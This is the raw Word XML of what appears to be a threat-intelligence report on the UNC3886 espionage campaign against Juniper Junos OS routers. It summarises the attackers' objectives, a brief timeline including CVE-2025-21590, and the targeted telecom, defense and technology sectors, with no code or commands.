    <w:p w14:paraId="750BDE6B" w14:textId="05ACA6B0" w:rsidR="001B2CDA" w:rsidRPr="003168F2" w:rsidRDefault="001B2CDA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Operational relay infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D83F653" w14:textId="244ED1CB" w:rsidR="001B2CDA" w:rsidRPr="003168F2" w:rsidRDefault="001B2CDA" w:rsidP="001B2CDA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Use compromised routers and network devices as proxy or relay nodes to route malicious traffic, conceal attacker origins, and support future attacks against other targets. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC90562" w14:textId="2AD959C8" w:rsidR="001B2CDA" w:rsidRPr="005632D5" w:rsidRDefault="001B2CDA" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005632D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Stealth persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DC9906" w14:textId="1FABCBE9" w:rsidR="00700371" w:rsidRDefault="001B2CDA" w:rsidP="001B2CDA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Maintain hidden and long-term access by embedding malicious activity within legitimate Junos OS processes, thereby reducing the likelihood of detection by administrators and security tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE58612" w14:textId="740528D9" w:rsidR="005632D5" w:rsidRDefault="005632D5" w:rsidP="001B2CDA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F87E315" w14:textId="05F50752" w:rsidR="005632D5" w:rsidRDefault="005632D5" w:rsidP="001B2CDA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251681792" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="39CB6B4F" wp14:editId="08FCF906">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1799212</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>239167</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3048000" cy="428625"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="1828870817" name="Rectangle: Rounded Corners 6"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3048000" cy="428625"/>
                        </a:xfrm>
                        <a:prstGeom prst="roundRect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="285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032E35F" id="Rectangle: Rounded Corners 6" o:spid="_x0000_s1026" style="position:absolute;margin-left:141.65pt;margin-top:18.85pt;width:240pt;height:33.75pt;z-index:2516817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" filled="f" strokecolor="#030e13 [484]" strokeweight="2.25pt">
                <v:stroke joinstyle="miter"/>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="400DF6E8" w14:textId="666F860E" w:rsidR="005632D5" w:rsidRPr="005632D5" w:rsidRDefault="005632D5" w:rsidP="005632D5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005632D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Timeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1EFC43" w14:textId="77777777" w:rsidR="005632D5" w:rsidRPr="003168F2" w:rsidRDefault="005632D5" w:rsidP="001B2CDA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="2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8221"/>
      </w:tblGrid>
      <w:tr w:rsidR="005632D5" w:rsidRPr="005632D5" w14:paraId="06805118" w14:textId="77777777" w:rsidTr="005632D5">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1935" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59B5FCC3" w14:textId="77777777" w:rsidR="005632D5" w:rsidRPr="005632D5" w:rsidRDefault="005632D5" w:rsidP="005632D5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005632D5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35AE9B15" w14:textId="77777777" w:rsidR="005632D5" w:rsidRPr="005632D5" w:rsidRDefault="005632D5" w:rsidP="005632D5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005632D5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Event</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005632D5" w:rsidRPr="005632D5" w14:paraId="74537B0A" w14:textId="77777777" w:rsidTr="005632D5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1935" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03B3BEBE" w14:textId="77777777" w:rsidR="005632D5" w:rsidRPr="005632D5" w:rsidRDefault="005632D5" w:rsidP="005632D5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005632D5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2022</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21A93B45" w14:textId="77777777" w:rsidR="005632D5" w:rsidRPr="005632D5" w:rsidRDefault="005632D5" w:rsidP="005632D5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005632D5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UNC3886 activity observed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005632D5" w:rsidRPr="005632D5" w14:paraId="4650371D" w14:textId="77777777" w:rsidTr="005632D5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1935" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41A41895" w14:textId="77777777" w:rsidR="005632D5" w:rsidRPr="005632D5" w:rsidRDefault="005632D5" w:rsidP="005632D5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005632D5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>July 2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F4FDFF9" w14:textId="77777777" w:rsidR="005632D5" w:rsidRPr="005632D5" w:rsidRDefault="005632D5" w:rsidP="005632D5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005632D5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Juniper discovers campaign</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005632D5" w:rsidRPr="005632D5" w14:paraId="6ED288A5" w14:textId="77777777" w:rsidTr="005632D5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1935" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E5F1D58" w14:textId="77777777" w:rsidR="005632D5" w:rsidRPr="005632D5" w:rsidRDefault="005632D5" w:rsidP="005632D5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005632D5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71F56938" w14:textId="77777777" w:rsidR="005632D5" w:rsidRPr="005632D5" w:rsidRDefault="005632D5" w:rsidP="005632D5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005632D5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Mandiant investigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005632D5" w:rsidRPr="005632D5" w14:paraId="30D8D2AA" w14:textId="77777777" w:rsidTr="005632D5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1935" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DD11329" w14:textId="77777777" w:rsidR="005632D5" w:rsidRPr="005632D5" w:rsidRDefault="005632D5" w:rsidP="005632D5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005632D5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78D8D10D" w14:textId="77777777" w:rsidR="005632D5" w:rsidRPr="005632D5" w:rsidRDefault="005632D5" w:rsidP="005632D5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005632D5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2025-21590 exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005632D5" w:rsidRPr="005632D5" w14:paraId="7A7B231E" w14:textId="77777777" w:rsidTr="005632D5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1935" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09168FD0" w14:textId="77777777" w:rsidR="005632D5" w:rsidRPr="005632D5" w:rsidRDefault="005632D5" w:rsidP="005632D5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005632D5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Present</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4197E00D" w14:textId="77777777" w:rsidR="005632D5" w:rsidRPr="005632D5" w:rsidRDefault="005632D5" w:rsidP="005632D5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005632D5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ongoing monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1247D65D" w14:textId="4DB82BF8" w:rsidR="005632D5" w:rsidRDefault="005632D5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7909EE97" w14:textId="77777777" w:rsidR="005632D5" w:rsidRDefault="005632D5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7120475A" w14:textId="77777777" w:rsidR="005632D5" w:rsidRDefault="005632D5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="71086846" w14:textId="6D01978F" w:rsidR="007423AA" w:rsidRPr="005632D5" w:rsidRDefault="00B42FCF" w:rsidP="005632D5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="56C7CB72" wp14:editId="13AEE901">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1613535</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-43815</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3581400" cy="428625"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="516706363" name="Rectangle: Rounded Corners 6"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3581400" cy="428625"/>
                        </a:xfrm>
                        <a:prstGeom prst="roundRect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="285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27470E2" id="Rectangle: Rounded Corners 6" o:spid="_x0000_s1026" style="position:absolute;margin-left:127.05pt;margin-top:-3.45pt;width:282pt;height:33.7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" filled="f" strokecolor="#030e13 [484]" strokeweight="2.25pt">
                <v:stroke joinstyle="miter"/>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007423AA" w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Targeted Sectors / Countries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203115A8" w14:textId="2C5FC4AA" w:rsidR="00CC017C" w:rsidRPr="003168F2" w:rsidRDefault="00CC017C" w:rsidP="007423AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Targeted Sectors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16188149" w14:textId="77777777" w:rsidR="00CC017C" w:rsidRPr="003168F2" w:rsidRDefault="00CC017C" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Telecommunications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45248A49" w14:textId="77777777" w:rsidR="00CC017C" w:rsidRPr="003168F2" w:rsidRDefault="00CC017C" w:rsidP="007423AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The attackers targeted telecommunications organizations to gain access to large-scale communication networks and routing infrastructure. Compromising telecom providers allowed them to monitor data traffic, intercept communications, and potentially gain indirect access to connected customers and partner networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D9F846" w14:textId="77777777" w:rsidR="00CC017C" w:rsidRPr="003168F2" w:rsidRDefault="00CC017C" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Defense Organizations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36166288" w14:textId="77777777" w:rsidR="00CC017C" w:rsidRPr="003168F2" w:rsidRDefault="00CC017C" w:rsidP="007423AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Defense-related organizations were targeted because of the strategic and sensitive nature of their communications, operational data, and network infrastructure. Access to these environments could provide valuable intelligence, support espionage activities, and expose confidential defense information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CED1BA" w14:textId="77777777" w:rsidR="00CC017C" w:rsidRPr="003168F2" w:rsidRDefault="00CC017C" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Technology Providers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005089A4" w14:textId="77777777" w:rsidR="00CC017C" w:rsidRPr="003168F2" w:rsidRDefault="00CC017C" w:rsidP="007423AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Technology companies were targeted due to their role in developing, managing, and supporting enterprise systems and networking technologies. By compromising technology providers, attackers could obtain intellectual property, administrative credentials, and access to downstream customer environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBD0D7B" w14:textId="77777777" w:rsidR="00CC017C" w:rsidRPr="003168F2" w:rsidRDefault="00CC017C" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
